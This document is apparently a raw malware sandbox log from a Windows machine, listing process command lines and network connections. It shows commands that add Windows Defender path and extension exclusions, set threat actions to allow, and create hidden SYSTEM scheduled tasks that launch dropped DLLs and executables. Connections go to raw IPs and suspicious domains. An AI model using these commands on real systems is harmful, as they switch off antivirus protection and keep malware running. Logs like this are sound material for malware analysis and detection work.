C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "glCifehbM" /SC once /ST 00:41:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "glCifehbM"
C:\Windows\system32\taskeng.exe
taskeng.exe {D1DE182D-1D60-4D58-9263-BC23DE8BBF71} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "glCifehbM"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\ZmzskowerwXEonlG\ahjCuEug\sGnsuMKEyQXmSdRs.wsf"
C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\ZmzskowerwXEonlG\ahjCuEug\sGnsuMKEyQXmSdRs.wsf"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fcblnlcRRSrBhAVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fcblnlcRRSrBhAVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fcblnlcRRSrBhAVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fcblnlcRRSrBhAVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 00:44:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe\" y7 /LsJNdidZN 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "WKALCIrwIEiqhKBsn"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 528
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe y7 /LsJNdidZN 385118 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\mDUhjS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\njCulwx.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jiLwFdOzPPQiWLm"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\MrGJyeV.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\nOQDWlY.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\hzdqbJz.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\dGqrYoA.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 01:07:16 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\ljYPaJVP\CqaQICj.dll\",#1 /qPoHdidXXXa 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QdCYtDviHOrgqJLgZ"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\ljYPaJVP\CqaQICj.dll",#1 /qPoHdidXXXa 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\ljYPaJVP\CqaQICj.dll",#1 /qPoHdidXXXa 385118
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 828
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 1532
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"
Network
| Country | Destination | Domain | Proto |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| RU | 185.215.113.67:40960 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| DE | 185.172.128.82:80 | 185.172.128.82 | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | gigapub.ma | udp |
| US | 8.8.8.8:53 | f000.backblazeb2.com | udp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 104.153.233.177:443 | f000.backblazeb2.com | tcp |
| FR | 51.75.247.100:443 | gigapub.ma | tcp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.50:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| GB | 99.86.249.29:80 | tcp | |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.50:80 | int.down.360safe.com | tcp |
| GB | 85.192.56.26:80 | tcp | |
| US | 172.67.75.163:443 | tcp | |
| NL | 23.63.101.153:80 | tcp | |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.104:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.120:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.50:80 | int.down.360safe.com | tcp |
| GB | 18.245.187.27:80 | int.down.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | orion.ts.360.com | udp |
| NL | 82.145.215.152:443 | orion.ts.360.com | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | tconf.cloud.360safe.com | udp |
| US | 8.8.8.8:53 | tconf.cloud.360safe.com | udp |
| IE | 54.194.203.69:80 | tconf.cloud.360safe.com | tcp |
| IE | 52.209.66.100:53 | tconf.cloud.360safe.com | udp |
| IE | 52.209.66.100:53 | tconf.cloud.360safe.com | udp |
| US | 8.8.8.8:53 | u.qurl.cloud.360safe.com | udp |
| IE | 52.209.66.100:53 | tconf.cloud.360safe.com | udp |
| IE | 52.209.66.100:80 | tconf.cloud.360safe.com | tcp |
| IE | 52.209.66.100:53 | tconf.cloud.360safe.com | udp |
| IE | 52.209.66.100:80 | tconf.cloud.360safe.com | tcp |
| IE | 54.77.143.119:80 | tcp | |
| US | 8.8.8.8:53 | u.qurl.cloud.360safe.com | udp |
| IE | 54.77.146.221:80 | tcp | |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | s.360totalsecurity.com | udp |
| NL | 82.145.213.41:80 | s.360totalsecurity.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | spec.cloud.360safe.com | udp |
| IE | 54.154.84.182:80 | spec.cloud.360safe.com | tcp |
| US | 104.192.109.75:80 | spec.cloud.360safe.com | tcp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 34.117.186.192:443 | tcp | |
| N/A | 34.117.186.192:443 | tcp | |
| GB | 18.245.187.104:80 | tcp | |
| DE | 52.29.179.141:80 | tcp | |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | tconf.cloud.360safe.com | udp |
| IE | 54.194.203.69:53 | tconf.cloud.360safe.com | udp |
| IE | 54.76.137.217:53 | udp | |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | api.check-data.xyz | udp |
